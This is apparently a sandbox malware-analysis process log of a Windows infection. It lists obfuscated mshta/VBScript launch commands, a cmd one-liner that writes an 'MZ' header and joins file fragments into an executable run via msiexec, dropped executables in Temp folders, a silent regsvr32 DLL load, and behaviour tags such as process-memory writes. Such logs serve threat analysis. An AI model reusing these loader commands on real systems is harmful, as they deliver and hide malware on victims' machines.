C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵PID:3420
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵PID:1940
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵PID:4052
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵PID:4908
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵PID:4696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:3332
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵PID:5128
C:\Windows\SysWOW64\taskkill.exetaskkill -im "D9RJLCLd2f8688ZYCUxUkMQi.exe" -F5⤵
- Kills process with taskkill
PID:3716
C:\Users\Admin\Pictures\Adobe Films\iJ_zxQndnIcJiYyrXyCpQokM.exe"C:\Users\Admin\Pictures\Adobe Films\iJ_zxQndnIcJiYyrXyCpQokM.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5364 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵PID:4516
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:5092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5036 -ip 50361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2680 -ip 26801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4624 -ip 46241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 768 -ip 7681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4492 -ip 44921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3184 -ip 31841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4196 -ip 41961⤵PID:2148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1476 -ip 14761⤵PID:5820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4752 -ip 47521⤵PID:2368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4076 -ip 40761⤵PID:5248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4640 -ip 46401⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\D85F.exeC:\Users\Admin\AppData\Local\Temp\D85F.exe1⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\D85F.exeC:\Users\Admin\AppData\Local\Temp\D85F.exe2⤵PID:5392
-
-
C:\Users\Admin\AppData\Local\Temp\3064.exeC:\Users\Admin\AppData\Local\Temp\3064.exe1⤵PID:228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 3002⤵
- Program crash
PID:4696
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 0bcb9e75efbef4f1243f5b3517ed512a YmKvmH36f0CNISNa9eIUHg.0.1.0.3.01⤵PID:3056
-
C:\Users\Admin\AppData\Local\Temp\43ED.exeC:\Users\Admin\AppData\Local\Temp\43ED.exe1⤵PID:5260
-
C:\Users\Admin\AppData\Local\Temp\43ED.exeC:\Users\Admin\AppData\Local\Temp\43ED.exe2⤵PID:3204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 228 -ip 2281⤵PID:3684
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\5553.dll1⤵PID:1372
-
C:\Users\Admin\AppData\Local\Temp\73D8.exeC:\Users\Admin\AppData\Local\Temp\73D8.exe1⤵PID:1672
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2360 -ip 23601⤵PID:5756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 4080 -ip 40801⤵PID:3480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 5044 -ip 50441⤵PID:5920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 1672 -ip 16721⤵PID:1156